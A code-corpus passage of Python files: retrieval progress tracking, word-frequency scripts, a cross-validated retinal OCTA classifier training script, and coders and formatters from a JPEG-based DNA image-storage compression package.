# NOTE: For now just giving each step equal weight, this can be tweaked.
total_weighted_steps = 0
for step_index in range(0, self.numSteps, 1):
total_weighted_steps += 1
# Create steps.
step_weight_list = [0.02,0.02,0.06,0.90]
self.stepList = []
for step_index in range(0, self.numSteps, 1):
adjusted_step_index = (self.index * self.numSteps) + step_index
self.stepList.append( RetrievalProgressStep(adjusted_step_index, step_weight_list[step_index]) )
def IncrementProgress(self, incremental_progress):
RetrievalProgressBase.IncrementProgress(self, incremental_progress)
#log.info("""Incremented iteration progress by %s, new progress = %s""" % (incremental_progress, self.progress))
#
# An entire file retrieval query, contains a list of iterations.
# Maintains progress of the entire query.
#
class RetrievalProgress(RetrievalProgressBase):
def __init__(self, time_ranges):
RetrievalProgressBase.__init__(self)
#self.bytes = int(0)
#self.pkts = int(0)
self.numIterations = len(time_ranges)
self.totalSteps = 0
#self.fileName = file_name
self.initial_wall_time = time.time()
self.last_guess = []
self.last_guess.append(0)
self.last_guess_time = []
self.last_guess_time.append(self.initial_wall_time)
# Figure out the total length of the query.
total_secs_in_query = 0
for (start_time, end_time) in time_ranges:
total_secs_in_query += (end_time - start_time)
#log.info("""RetrievalProgress: total_secs_in_query = %s, num_iterations = %s""" % (total_secs_in_query,self.numIterations))
# Create iterations
self.iterationList = []
iter_index = 0
total_weight = 0
iter_weight = 0
for (start_time, end_time) in time_ranges:
num_secs_in_iter = end_time - start_time
if (total_secs_in_query > 0):
iter_weight = float(num_secs_in_iter) / total_secs_in_query
#log.info("""RetrievalProgress: creating interation %s, secs_in_iter = %s, iter_weight = %s""" % (iter_index,num_secs_in_iter,iter_weight))
self.iterationList.append( RetrievalProgressIteration(iter_index, iter_weight) )
self.totalSteps += self.iterationList[iter_index].numSteps
iter_index += 1
total_weight += iter_weight
#log.info("""RetrievalProgress: total_weight = %s""" % (total_weight))
# Update the query progress.
def IncrementProgress(self, incremental_progress):
RetrievalProgressBase.IncrementProgress(self, incremental_progress)
#log.info("""Incremented query progress by %s, new progress = %s""" % (incremental_progress, self.progress))
#self.bytes = int(recdopt.get_written_bytes(ctypes.c_char_p(self.fileName)))
#self.pkts = int(recdopt.get_written_packets(ctypes.c_char_p(self.fileName)))
def time_estimate(self):
current_wall_time = time.time()
seconds_so_far = current_wall_time - self.initial_wall_time
estimated_remaining_seconds = self.last_guess[0]
if seconds_so_far <= 5:
# Wait a few secs to make the first guess.
return "Please wait..."
if self.progress <= 0:
# If no progress yet, can't make a guess.
return "Please wait..."
# Only make a new guess every 5 secs so it doesn't jump around so much.
seconds_since_last_guess = current_wall_time - self.last_guess_time[0]
if seconds_since_last_guess > 5:
# Make a new guess.
estimated_remaining_seconds = int( math.ceil( (seconds_so_far * (1.0 - self.progress)) / self.progress ) )
self.last_guess_time[0] = current_wall_time
self.last_guess[0] = estimated_remaining_seconds
else:
# Just decrement the current guess.
if (estimated_remaining_seconds > seconds_since_last_guess):
estimated_remaining_seconds -= seconds_since_last_guess
else:
estimated_remaining_seconds = 0
self.last_guess[0] = estimated_remaining_seconds
return TimeUtils.time_remaining(estimated_remaining_seconds)
#
# Progress update functions.
# These functions control the RetrievalProgress classes.
#
# Progress is based on how many steps of the total steps in a query
# we have completed and the relative weight of each step.
#
# Progress never goes backwards, only forwards!
# Update the progress of the current step, the iteration it is part of and the entire query.
def IncrementProgressByStepProgress(query, iter, step, current_step_progress):
incremental_step_progress = current_step_progress - step.progress
step.IncrementProgress(incremental_step_progress)
iter.IncrementProgress(incremental_step_progress * step.weight)
query.IncrementProgress(incremental_step_progress * step.weight * iter.weight)
# Increment progress when a step is finished.
def StepFinished(query, iter, step):
additional_step_progress = 1.0 - step.progress
step.Finished()
iter.IncrementProgress(additional_step_progress * step.weight)
query.IncrementProgress(additional_step_progress * step.weight * iter.weight)
``` |
{
"source": "jia-alt/python-test",
"score": 3
} |
#### File: jia-alt/python-test/wf.py
```python
import argparse
import os
import sys
def openFile(filePath):
with open(filePath, "r", encoding="utf-8") as file:
filecontent = file.read()
for replaceChar in '!"#$&()*+,-./:;<=>?@[\\]^_{|}·~“”‘’':
filecontent = filecontent.replace(replaceChar, " ")
return filecontent.lower().split()
def sortAndprint(wordList):
wordDict = {}
for word in wordList:
wordDict[word] = wordDict.get(word, 0) + 1
wordDict_List=list(wordDict.items())
wordDict_List.sort(key=lambda x:x[1],reverse=True)
print("{0:<10}{1}".format('total',len(wordDict_List)),'words')
print('\n')
if(len(wordDict_List) > 10):
for i in range(10):
word,count =wordDict_List[i]
print("{0:<10}{1}".format(word,count))
else:
for i in range(len(wordDict_List)):
word,count =wordDict_List[i]
print("{0:<10}{1}".format(word,count))
return
parser = argparse.ArgumentParser()
parser.add_argument('-s',nargs = '?')
parser.add_argument("filePath", nargs = '?')
args = parser.parse_args()
if ((args.filePath == None) and (args.s == None)):
redi = sys.stdin.read()
for ch in '!"#$&()*+,-./:;<=>?@[\\]^_{|}·~“”‘’':
redi = redi.replace(ch, " ")
txtStr = redi.lower().split()
sortAndprint(txtStr)
pass
elif ((args.s != None) and(os.path.isfile(args.s) == True) and (args.filePath == None)):
#print('File:' + args.s.split('.')[0])
sortAndprint(openFile(args.s))
pass
elif ((args.filePath != None) and (os.path.isdir(args.filePath) == True) and (args.s == None)):
filePathList = os.listdir(args.filePath)
for file in filePathList:
print(file.split('.')[0])
sortAndprint(openFile(args.filePath + '\\' + file))
print("----")
pass
elif ((args.filePath != None) and(os.path.isfile(args.filePath) != True) and (args.s == None) and (os.path.isdir(args.filePath) != True)):
#print('File:' + args.filePath)
args.filePath=args.filePath+".txt"
sortAndprint(openFile(args.filePath))
pass
pass
``` |
{
"source": "jia-alt/uuu",
"score": 3
} |
#### File: jia-alt/uuu/wf.py
```python
import sys
import getopt
import re
import os
def count_split(str):
text= re.findall(r'[a-z0-9^-]+', str) #指定特殊字符
#字符替换
dict = {} #创建字典
for str in text: #遍历文件内单词
if str in dict.keys():
dict[str] = dict[str] + 1
else:
dict[str] = 1
word_list=sorted(dict.items(), key=lambda x: x[1], reverse=True)
return word_list
def file_read(filename): # 打开文件
f = open(filename, 'r', -1, 'utf-8')
text = f.read().lower()
word_list = count_split(text)
f.close()
return word_list
def get_words(argv): # 根据输入的命令行参数执行对应操作
if len(argv) == 2: # 功能1
try:
list = file_read(argv[-1])
opts, args = getopt.getopt(argv, "sh", ["ifile", "ofile"])
except getopt.GetoptError:
print("test.py -i <inputfile> -o <outputfile>")
sys.exit(2)
for opt, arg in opts:
if opt == "-s":
num = len(list)
print('total',num)
print('\n')
for word in list:
print('{:20s}{:>5d}'.format(word[0], word[1]))
elif len(argv) == 1: #功能2.3
file = argv[-1] + '.txt'
is_file = os.path.exists(file)
if is_file:
list = file_read(file)
if len(list) <=10:
print('total', len(list), 'words')
print('\n')
for item in list:
print('{:20s}{:>5d}'.format(item[0], item[1]))
else: # 多于10条
print('total', len(list), 'words')
print('\n')
for i in range(10):
print('{:20s}{:>5d}'.format(list[i][0], list[i][1]))
else:
if argv[-1] != '-s':
folder_name = argv[-1]
os.chdir(folder_name)
filename_list = os.listdir()
for file_name in filename_list:
print(file_name[:-4])
file_list = [file_name[:-4]]
get_words(file_list)
print('----')
def main(argv):
get_words(argv)
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "jiaangyao/amd_octa",
"score": 3
} |
#### File: amd_octa/train_single_model_cv/run_training_cv.py
```python
import os
import pathlib
import pickle
import numpy as np
from config.load_config import get_config
from config.config_utils import initialize_config_preproc, initialize_config_split, initialize_config_training
from preproc.preprocess import generate_labels, correct_data_label
from preproc.train_val_test_split import prepare_data_for_train_cv
from modeling.model import get_model, get_callbacks
from save_load.io_funcs import save_cfg, save_csv, save_model, save_mat
from utils.get_patient_id import get_patient_id_by_label
from analysis.plotting import plot_training_loss, plot_training_acc, plot_raw_conf_matrix, plot_norm_conf_matrix
def run_training_cv(vec_Xs, vec_ys, cfg):
vec_history = []
# find the aggregate results on the entire dataset
vec_y_true = []
vec_y_pred = []
vec_y_pred_prob = []
# also declare empty list for the validation set
vec_y_valid_true = []
vec_y_valid_pred = []
vec_y_valid_pred_prob = []
for idx_fold in range(len(vec_Xs)):
print('\n\nFold: {}\n'.format(idx_fold))
Xs = vec_Xs[idx_fold]
ys = vec_ys[idx_fold]
print("\nx_train Angiography cube shape: {}".format(Xs[0][0].shape))
print("x_train Structure OCT cube shape: {}".format(Xs[0][1].shape))
print("x_train B scan shape: {}".format(Xs[0][2].shape))
print("x_train 3D B scan shape: {}".format(Xs[0][3].shape))
print("y_train onehot shape: {}".format(ys[0].shape))
print("\nx_valid Angiography cube shape: {}".format(Xs[1][0].shape))
print("x_valid Structure OCT cube shape: {}".format(Xs[1][1].shape))
print("x_valid B scan shape: {}".format(Xs[1][2].shape))
print("x_valid 3D B scan shape: {}".format(Xs[1][3].shape))
print("y_valid onehot shape: {}".format(ys[1].shape))
print("\nx_test Angiography cube shape: {}".format(Xs[2][0].shape))
print("x_test Structure OCT cube shape: {}".format(Xs[2][1].shape))
print("x_test B scan shape: {}".format(Xs[2][2].shape))
print("x_test 3D B scan shape: {}".format(Xs[2][3].shape))
print("y_test onehot shape: {}".format(ys[2].shape))
# Get and train model
model_curr = get_model(cfg.str_arch, cfg)
callbacks_curr = get_callbacks(cfg)
h = model_curr.fit(Xs[0], ys[0], batch_size=cfg.batch_size, epochs=cfg.n_epoch, verbose=2,
callbacks=callbacks_curr,
validation_data=(Xs[1], ys[1]), shuffle=False, validation_batch_size=Xs[1][0].shape[0])
vec_history.append(h.history)
# save trained models
save_model(model_curr, cfg, overwrite=True, save_format='tf', idx_cv_fold=idx_fold)
# plotting training history
plot_training_loss(h, cfg, save=True)
plot_training_acc(h, cfg, save=True)
# Now perform prediction
train_set_score = model_curr.evaluate(Xs[0], ys[0], callbacks=callbacks_curr, verbose=0)
valid_set_score = model_curr.evaluate(Xs[1], ys[1], callbacks=callbacks_curr, verbose=0)
test_set_score = model_curr.evaluate(Xs[2], ys[2], callbacks=callbacks_curr, verbose=0)
print("\nTrain set accuracy: {}".format(train_set_score[1]))
print("Valid set accuracy: {}".format(valid_set_score[1]))
print("Test set accuracy: {}".format(test_set_score[1]))
cfg.vec_acc = [train_set_score[1], valid_set_score[1], test_set_score[1]]
if cfg.num_classes == 2:
# make predictions for test set
y_true = ys[-1]
y_pred_logits = model_curr.predict(Xs[2])
y_pred = y_pred_logits.copy()
y_pred[y_pred >= 0.5] = 1
y_pred[y_pred < 0.5] = 0
y_pred = y_pred.reshape(-1)
# now transform the logits into a matrix of two class probabilities and append
y_pred_logits = np.concatenate([1 - y_pred_logits, y_pred_logits], axis=1)
# make predictions for validation set
y_valid_true = ys[1]
y_valid_pred_logits = model_curr.predict(Xs[1])
y_valid_pred = y_valid_pred_logits.copy()
y_valid_pred[y_valid_pred >= 0.5] = 1
y_valid_pred[y_valid_pred < 0.5] = 0
y_valid_pred = y_valid_pred.reshape(-1)
# nwo transform the logits into two class probabilities and append for validation set
y_valid_pred_logits = np.concatenate([1 - y_valid_pred_logits, y_valid_pred_logits], axis=1)
else:
# make the predictions for the test set
y_true = np.argmax(ys[-1], axis=1)
y_pred = np.argmax(model_curr.predict(Xs[2]), axis=1)
y_pred_logits = model_curr.predict(Xs[2])
# make the predictions for the validation set
y_valid_true = np.argmax(ys[1], axis=1)
y_valid_pred = np.argmax(model_curr.predict(Xs[1]), axis=1)
y_valid_pred_logits = model_curr.predict(Xs[1])
# plot the confusion matrices
plot_raw_conf_matrix(y_true, y_pred, cfg, save=True)
plot_norm_conf_matrix(y_true, y_pred, cfg, save=True)
# now append the results to a list
vec_y_true.append(y_true)
vec_y_pred.append(y_pred)
vec_y_pred_prob.append(y_pred_logits)
# append the results from the validation set also
vec_y_valid_true.append(y_valid_true)
vec_y_valid_pred.append(y_valid_pred)
vec_y_valid_pred_prob.append(y_valid_pred_logits)
# Now we are outside of the loop
y_true_unsorted_all = np.concatenate(vec_y_true, axis=-1)
y_pred_unsorted_all = np.concatenate(vec_y_pred, axis=-1)
y_pred_prob_unsorted_all = np.concatenate(vec_y_pred_prob, axis=0)
# Now obtain the correct indices
vec_idx_absolute_test_all = []
for idx_fold in range(len(vec_Xs)):
vec_idx_test_curr = cfg.vec_idx_absolute[idx_fold][-1]
vec_idx_absolute_test_all.append(vec_idx_test_curr)
vec_idx_absolute_test_all = np.concatenate(vec_idx_absolute_test_all, -1)
# Now get all the test set data
idx_permutation_sort = np.argsort(vec_idx_absolute_test_all)
y_true_all = y_true_unsorted_all[idx_permutation_sort]
y_pred_all = y_pred_unsorted_all[idx_permutation_sort]
y_pred_prob_all = y_pred_prob_unsorted_all[idx_permutation_sort, ...]
cfg.y_test_true = y_true_all
cfg.y_test_pred = y_pred_all
cfg.y_test_pred_prob = y_pred_prob_all
# also generate the data for the validation set predictions
y_valid_true_unsorted_all = np.concatenate(vec_y_valid_true, axis=-1)
y_valid_pred_unsorted_all = np.concatenate(vec_y_valid_pred, axis=-1)
y_valid_pred_prob_unsorted_all = np.concatenate(vec_y_valid_pred_prob, axis=0)
cfg.y_valid_true = y_valid_true_unsorted_all
cfg.y_valid_pred = y_valid_pred_unsorted_all
cfg.y_valid_pred_prob = y_valid_pred_prob_unsorted_all
test_acc_full = np.sum(y_true_all == y_pred_all) / len(y_true_all)
print("\nOverall accuracy: {}".format(test_acc_full))
cfg.test_acc_full = test_acc_full
# Print out the patient IDs corresponding to the query
# Here for example
# if you are running 'disease' label and you set true_label_id = 0 and predicted_label_id = 2
# then you would get the patients who are normal/healthy and but falsely classified as NV AMD
# the true_label_id and predicted_label_id correspond to cfg.vec_str_labels defined above
# print(get_patient_id_by_label(y_true_all, y_pred_all, true_label_id=0, predicted_label_id=2, cfg=cfg))
# you can also print multiple of these at the same time
# print(get_patient_id_by_label(y_true_all, y_pred_all, true_label_id=2, predicted_label_id=1, cfg=cfg))
# Extra caveat: for feature labels since we don't have possible any more and since the classes
# are automatically recasted to get the FN (patient has the feature but network predicts not present)
# you need to do something like
print(get_patient_id_by_label(y_true_all, y_pred_all, true_label_id=1, predicted_label_id=0, cfg=cfg))
# Plot and save the final result
plot_raw_conf_matrix(y_true_all, y_pred_all, cfg, save=True, cv_all=True)
plot_norm_conf_matrix(y_true_all, y_pred_all, cfg, save=True, cv_all=True)
# append final training history
cfg.vec_history = vec_history
# save the output as a csv file also
save_csv(y_true_all, y_pred_all, cfg)
# save the cfg, which contains configurations and results
save_cfg(cfg, overwrite=True)
# save the mat file, which contains all useful output information
save_mat(cfg, overwrite=True, bool_save_valid=True)
return cfg
if __name__ == '__main__':
# Configuring the files here for now
cfg_template = get_config(filename=pathlib.Path(os.getcwd()).parent / 'config' / 'default_config.yml')
cfg_template.user = 'jyao'
cfg_template.load_mode = 'csv'
cfg_template.overwrite = True
cfg_template = initialize_config_preproc(cfg_template)
# now load the actual cfg generated from the data
vec_idx_patient = [1, 310]
f_cfg_handle = "preproc_cfg_{}_{}.pkl".format(vec_idx_patient[0], vec_idx_patient[1])
f_cfg = cfg_template.d_preproc / f_cfg_handle
with open(str(f_cfg), 'rb') as handle:
cfg = pickle.load(handle)
# name of particular feature that will be used
# note if want to test for disease label then have to specify this to be 'disease'
# otherwise it has to be one of ['IRF/SRF', 'Scar', 'GA', 'CNV', 'Large PED']
cfg.str_feature = 'Scar'
# whether or not to make the training set balanced - note this will give you imbalanced test set
cfg.balanced = False
# for CV script then here the cross validation mode should be enabled
cfg.cv_mode = True
# specify model architecture and whether to use debug mode
cfg.str_arch = 'arch_022'
cfg.debug_mode = True
# now load the preprocessed data and the label
f_data_handle = "preproc_data_{}_{}.pkl".format(vec_idx_patient[0], vec_idx_patient[1])
f_data = cfg_template.d_preproc / f_data_handle
with open(str(f_data), 'rb') as handle:
X = pickle.load(handle)
y = generate_labels(cfg.str_feature, cfg, bool_append_csv_to_cfg=True)
# now prepare data for training
cfg = initialize_config_split(cfg)
X, y = correct_data_label(X, y, cfg)
vec_Xs, vec_ys = prepare_data_for_train_cv(X, y, cfg)
# finally set the training parameters
cfg = initialize_config_training(cfg, bool_debug=cfg.debug_mode)
cfg = run_training_cv(vec_Xs, vec_ys, cfg)
```
#### File: amd_octa/utils/context_management.py
```python
import contextlib
import numpy as np
@ contextlib.contextmanager
def temp_seed(seed):
"""
This function allows temporary creating a numpy random number generator state and is used to ensure that
splitting the data can be performed with the same random seed 20194040 while the rest of the script is not affected
by that random state
:param seed: Desired random seed to be used
"""
# Obtain the old random seed
state = np.random.get_state()
# Set the np random seed in the current environment to the desired seed number
np.random.seed(seed)
try:
yield
finally:
# Reset the seed when the function is not called
np.random.set_state(state)
``` |
{
"source": "Jiaanzhu/Image-compression-for-DNA-storage",
"score": 3
} |
#### File: jpegdna/coders/hexcoder.py
```python
from jpegdna.coders import AbstractCoder
class HexCoder(AbstractCoder):
"""Hexadecimal coder"""
def encode(self, inp):
if inp < 0:
return "err"
return hex(inp)[2:].upper()
def decode(self, code):
return int("0x"+code.lower(), 0)
```
#### File: jpegdna/coders/__init__.py
```python
from abc import ABC, abstractmethod
# pylint: disable=missing-class-docstring
class AutomataException(Exception):
pass
class AutomataGetterException(AutomataException):
pass
class AutomataGetterExceptionEncode(AutomataGetterException):
pass
class AutomataGetterExceptionDecode(AutomataGetterException):
pass
class AutomataSetterException(AutomataException):
pass
class AutomataSetterExceptionEncode(AutomataSetterException):
pass
class AutomataSetterExceptionDecode(AutomataSetterException):
pass
# pylint: enable=missing-class-docstring
class AbstractCoder(ABC):
"""Abstract class for codec definition"""
def set_state(self, *args, case=None) -> None:
"""Helper method to set the state of the codec if necessary"""
def get_state(self, case=None) -> any:
"""Helper method to get the state of the codec if necessary"""
def full_encode(self, inp, *args):
"""Encoding method
:param inp: Input to encode
:type inp: list|str
:param args: Encoding arguments
:type args: any
:return: Encoded message, encoding state
:rtype: list|str, any
"""
@abstractmethod
def encode(self, inp):
"""Encoding method
:param inp: Input to encode
:type inp: list|str
:return: Encoded message
:rtype: list|str
"""
def full_decode(self, code, *args):
"""Encoding method
:param code: Input to decode
:type code: list|str
:param args: Decoding arguments
:type args: any
:return: Decoded message, decoding state
:rtype: list|str, any
"""
@abstractmethod
def decode(self, code):
"""Decoding method
:param code: Input to decode
:type code: list|str
:return: Decoded message
:rtype: list|str
"""
# pylint: disable=wrong-import-position
from jpegdna.coders.huffmancoder import HuffmanCoder
from jpegdna.coders.goldmancoder import GoldmanCoder, GoldmanCoderDNA, NonDecodableGoldman
from jpegdna.coders.hexcoder import HexCoder
from jpegdna.coders.categorycoder import ACCategoryCoder, DCCategoryCoder, NonDecodableCategory
from jpegdna.coders.valuecoder import ValueCoder
from jpegdna.coders.coefficientcoder import ACCoefficientCoder, DCCoefficientCoder
```
#### File: jpegdna/coders/valuecoder.py
```python
import numpy as np
from jpegdna.coders import AbstractCoder
from jpegdna.coders import AutomataGetterException, AutomataSetterException, AutomataSetterExceptionEncode, AutomataSetterExceptionDecode
def get_codebook(ad_bits, codebook):
"""Returns the exhaustive codebooks for a given codeword length
:param ad_bits: codewor length
:type ad_bits: int
:return: Codebook
:rtype: list(str)
"""
return codebook[ad_bits-2]
def compute_min_value(ad_bits):
"""Compute the min value for the codebook with codewords of length ad_bits
:param ad_bits: codeword length
:type ad_bits: int
:return: min value
:rtype: int
"""
tab = [0, None, 1, 6, 18, 83, 376, 1264, 5263, 17580, 72910]
return tab[ad_bits]
def compute_max_value(ad_bits):
"""Compute the max value for the codebook with codewords of length ad_bits
:param ad_bits: codeword length
:type ad_bits: int
:return: max value
:rtype: int
"""
tab = [0, None, 5, 17, 82, 375, 1263, 5262, 17579, 72909, 305276]
return tab[ad_bits]
class ValueCoder(AbstractCoder):
"""Value Coder
:var verbose: Verbosity enabler
:param verbose: bool
:ivar category: category in which belongs the value
:vartype category: int
:ivar ad_bits: length of the word coding the value
:vartype ad_bits: int
"""
def __init__(self, codebook, verbose=False):
self.category = 0
self.ad_bits = 0
self.code_length = 0
self.verbose = verbose
self.codebook = codebook
def set_state(self, *args, case=None):
"""Sets the state for the decoding"""
if len(args) == 1 and case == 'encode':
self.category = args[0]
elif case == 'encode':
raise AutomataSetterExceptionEncode(f"ValueCoder: Invalid number of parameters, 1 expected, {len(args)} given.")
elif len(args) == 2 and case == 'decode':
self.ad_bits = args[0]
self.code_length = args[1]
elif case == 'decode':
raise AutomataSetterExceptionDecode(f"ValueCoder: Invalid number of parameters, 2 expected, {len(args)} given.")
else:
raise AutomataSetterException("ValueCoder: Invalid parameters, expected case parameter in {'encode'|'decode'}" +
f" but got {case}")
def get_state(self, case=None):
"""Return new state after encoding
:return: The number of bits it took in the stream and
the length of the codeword for this category
:rtype: int, int
"""
if case is not None and case != 'encode' and case != 'decode':
raise AutomataGetterException("ValueCoder: Invalid parameter, expected case parameter in {None|'encode'|'decode'}" +
f" but got {case}")
return self.ad_bits, self.code_length
def full_encode(self, inp, *args):
self.set_state(*args, case='encode')
return self.encode(inp)
def encode(self, inp):
"""Encode a value according to a category
:param inp: value to be encoded
:type inp: int
"""
if self.category == -1:
raise ValueError("ValueCoder: Invalid value, out of range, category = -1")
if self.category == 0:
self.ad_bits = 0
return ""
else:
self.ad_bits = self.category+1
codebook = get_codebook(self.ad_bits, self.codebook)
#TODO Prepare code for new codebooks
min_val = compute_min_value(self.ad_bits)
if inp > 0:
# print((inp, min_val, self.ad_bits, len(codebook), (inp-min_val)))
# print(inp-min_val)
encoded = codebook[(inp-min_val)]
else:
# print((inp, min_val, self.ad_bits, len(codebook), (-abs(inp)-min_val)))
# print(-(abs(inp)-min_val) - 1)
encoded = codebook[-(abs(inp)-min_val) - 1]
return encoded
def full_decode(self, code, *args):
self.set_state(*args, case='decode')
return self.decode(code)
def decode(self, code):
"""Decode a value
:param code: Sequence to be decoded
:type code: str
"""
if self.ad_bits == 0:
return 0
codebook = get_codebook(self.ad_bits, self.codebook)
code_value = code[self.code_length:self.code_length+self.ad_bits]
idx = np.nonzero(np.in1d(codebook, code_value))
try:
idx = idx[0][0]
except:
return 0 # Cdeword not directly decodable because not in the codebook
min_val, max_val = compute_min_value(self.ad_bits), compute_max_value(self.ad_bits)
vecpos = list(range(min_val, max_val+1))
vecneg = list(range(-max_val, -min_val+1))
vec = vecpos + vecneg
# print(vecpos)
# print(vecneg)
# print(len(vec))
# print(vec)
return vec[idx]
```
#### File: jpegdna/format/generalinfoformatter.py
```python
from pathlib import Path
import numpy as np
import jpegdna
from jpegdna.format import AbstractFormatter
from jpegdna.tools.strand_tools import generate_random_strand, compute_length
from jpegdna.tools.loader import load_codebook_matrix
from jpegdna.transforms import ChannelSampler
class GeneralInfoFormatter(AbstractFormatter):
"""Formatter for the general information related to the compression
:ivar alpha: alpha value of the compression, if it is known
:type alpha: float
:ivar freq_origin: origin of the frequencies ("default" or "from_img")
:type freq_origin: str
:ivar m: first dimension of the image
:type m: int
:ivar n: second dimension of the image
:type n: int
:ivar blockdims: dimensions of the block used for DCT
:type blockdims: tuple
:ivar max_cat: max value for the categories
:type max_cat: int
:ivar max_runcat: max value for the run/categories
:type max_runcat: int
:ivar dc_freq_len: codeword length for encoding the dc frequencies
:type dc_freq_len: int
:ivar ac_freq_len: codeword length for encoding the ac frequencies
:type ac_freq_len: int
:ivar oligo_length: Size of the oligos used for formatting
:type oligo_length: int
"""
IMAGE_TYPES = ["gray", "RGB"]
def __init__(self, alpha, freq_origin, m, n, blockdims, max_cat, max_runcat, dc_freq_len, ac_freq_len, image_type, sampler, header, oligo_length=200, debug=False):
self.alpha = alpha
self.freq_origin = freq_origin
self.m, self.n = m, n
self.oligo_length = oligo_length
if debug:
self.general_info_header = "\033[33m" + header + "\033[0m"
else:
self.general_info_header = header
self.header_len = len(header)
self.barcodes = ['AATTC',
'AAGAG',
'ATAAC',
'ACCTG',
'TTATG',
'TCTCG',
'TGCAG',
'CCACA',
'CGTTG',
'GGATC']
self.blockdims = blockdims
self.max_cat = max_cat
self.max_runcat = max_runcat
self.dc_freq_len = dc_freq_len
self.ac_freq_len = ac_freq_len
self.codebook = load_codebook_matrix(Path(jpegdna.__path__[0] + "/data/codebook.pkl"))
self.debug = debug
if image_type is not None:
self.image_type = self.IMAGE_TYPES.index(image_type)
else:
self.image_type = None
self.sampler = sampler
# self.samplers = list(set([el[25:].replace("_", ":") for el in dir(ChannelSampler) if "_ChannelSampler__" in el]))
self.samplers = ['4:2:0', '4:2:2', '4:1:1', '4:4:0', '4:4:4']
if self.sampler is not None:
self.channel_sampler = ChannelSampler(sampler=self.sampler)
else:
self.channel_sampler = None
def colored_image(self):
"""Check if image is colored or gray level
:rtype: bool
"""
return self.image_type == 1
def format(self, inp):
if inp is not None:
raise ValueError
data_payload_length = self.oligo_length
n_rows, n_cols = self.m, self.n
alpha = round(self.alpha, 3)
blockdims = self.blockdims
max_cat, max_runcat = self.max_cat, self.max_runcat
int_alpha = int(alpha)
float_alpha = alpha - int_alpha
if self.debug:
oligo = (self.general_info_header +
"\033[31m" + self.barcodes[blockdims[0]] + self.barcodes[blockdims[1]] +
"\033[32m" + self.barcodes[n_rows//1000] + self.barcodes[(n_rows%1000)//100] + self.barcodes[(n_rows%100)//10] + self.barcodes[n_rows%10] +
"\033[31m" + self.barcodes[n_cols//1000] + self.barcodes[(n_cols%1000)//100] + self.barcodes[(n_cols%100)//10] + self.barcodes[n_cols%10] +
"\033[32m" + self.barcodes[max_cat//10] + self.barcodes[max_cat%10] +
"\033[31m" + self.barcodes[max_runcat//100] + self.barcodes[(max_runcat%100)//10] + self.barcodes[max_runcat%10] +
"\033[32m" + self.barcodes[self.dc_freq_len] +
"\033[31m" + self.barcodes[self.ac_freq_len//10] + self.barcodes[self.ac_freq_len%10] +
"\033[32m" + self.barcodes[int_alpha] +
"\033[31m" + self.barcodes[int((float_alpha*10)%10)] +
"\033[31m" + self.barcodes[int((float_alpha*100)%10)] +
"\033[31m" + self.barcodes[int((float_alpha*1000)%10)] +
"\033[31m" + self.barcodes[self.image_type] + "\033[0m")
else:
oligo = (self.general_info_header +
self.barcodes[blockdims[0]] + self.barcodes[blockdims[1]] +
self.barcodes[n_rows//1000] + self.barcodes[(n_rows%1000)//100] + self.barcodes[(n_rows%100)//10] + self.barcodes[n_rows%10] +
self.barcodes[n_cols//1000] + self.barcodes[(n_cols%1000)//100] + self.barcodes[(n_cols%100)//10] + self.barcodes[n_cols%10] +
self.barcodes[max_cat//10] + self.barcodes[max_cat%10] +
self.barcodes[max_runcat//100] + self.barcodes[(max_runcat%100)//10] + self.barcodes[max_runcat%10] +
self.barcodes[self.dc_freq_len] +
self.barcodes[self.ac_freq_len//10] + self.barcodes[self.ac_freq_len%10] +
self.barcodes[int_alpha] +
self.barcodes[int((float_alpha*10)%10)] +
self.barcodes[int((float_alpha*100)%10)] +
self.barcodes[int((float_alpha*1000)%10)] +
self.barcodes[self.image_type])
if self.colored_image():
oligo += self.barcodes[self.samplers.index(self.sampler)]
ind = -1
while oligo[ind] not in ["A", "T", "C", "G"]:
ind -= 1
before = oligo[ind]
if self.debug:
return oligo + "\033[30;47m" + generate_random_strand(data_payload_length-compute_length(oligo)+self.header_len, before, "A") + "\033[0;37;40m"
else:
return oligo + generate_random_strand(data_payload_length-len(oligo)+self.header_len, before, "A")
def deformat(self, oligos):
oligo = oligos
reading_head = 0
self.blockdims = (self.barcodes.index(oligo[reading_head:reading_head+5]), self.barcodes.index(oligo[reading_head+5:reading_head+10]))
reading_head += 10
self.m = (self.barcodes.index(oligo[reading_head:reading_head+5]) * 1000 +
self.barcodes.index(oligo[reading_head+5:reading_head+10]) * 100 +
self.barcodes.index(oligo[reading_head+10:reading_head+15]) * 10 +
self.barcodes.index(oligo[reading_head+15:reading_head+20]))
reading_head += 20
self.n = (self.barcodes.index(oligo[reading_head:reading_head+5]) * 1000 +
self.barcodes.index(oligo[reading_head+5:reading_head+10]) * 100 +
self.barcodes.index(oligo[reading_head+10:reading_head+15]) * 10 +
self.barcodes.index(oligo[reading_head+15:reading_head+20]))
reading_head += 20
self.max_cat = (self.barcodes.index(oligo[reading_head:reading_head+5]) * 10 +
self.barcodes.index(oligo[reading_head+5:reading_head+10]))
reading_head += 10
self.max_runcat = (self.barcodes.index(oligo[reading_head:reading_head+5]) * 100 +
self.barcodes.index(oligo[reading_head+5:reading_head+10]) * 10 +
self.barcodes.index(oligo[reading_head+10:reading_head+15]))
reading_head += 15
self.dc_freq_len = self.barcodes.index(oligo[reading_head:reading_head+5])
reading_head += 5
self.ac_freq_len = (self.barcodes.index(oligo[reading_head:reading_head+5]) * 10 +
self.barcodes.index(oligo[reading_head+5:reading_head+10]))
if self.dc_freq_len == 0 and self.ac_freq_len == 0:
self.freq_origin = "default"
else:
self.freq_origin = "from_img"
reading_head += 10
self.alpha = (self.barcodes.index(oligo[reading_head:reading_head+5]) +
self.barcodes.index(oligo[reading_head+5:reading_head+10]) / 10 +
self.barcodes.index(oligo[reading_head+10:reading_head+15]) / 100 +
self.barcodes.index(oligo[reading_head+15:reading_head+20]) / 1000)
reading_head += 20
self.image_type = self.barcodes.index(oligo[reading_head:reading_head+5])
reading_head += 5
if self.colored_image():
self.sampler = self.samplers[self.barcodes.index(oligo[reading_head:reading_head+5])]
res = self.channel_sampler.forward((np.zeros((self.n, self.m, 3))))
self.m, self.n = [None, None, None], [None, None, None]
self.n[0], self.m[0] = res[0].shape
self.n[1], self.m[1] = res[1].shape
self.n[2], self.m[2] = res[2].shape
self.m = tuple(self.m)
self.n = tuple(self.n)
if self.debug:
print(f"Block dimensions: {self.blockdims}")
print(f"Image size: {(self.m, self.n)}")
print(f"(max_cat, max_runcat): {(self.max_cat, self.max_runcat)}")
print(f"(dc_freq_len, ac_freq_len): {((self.dc_freq_len, self.ac_freq_len))}")
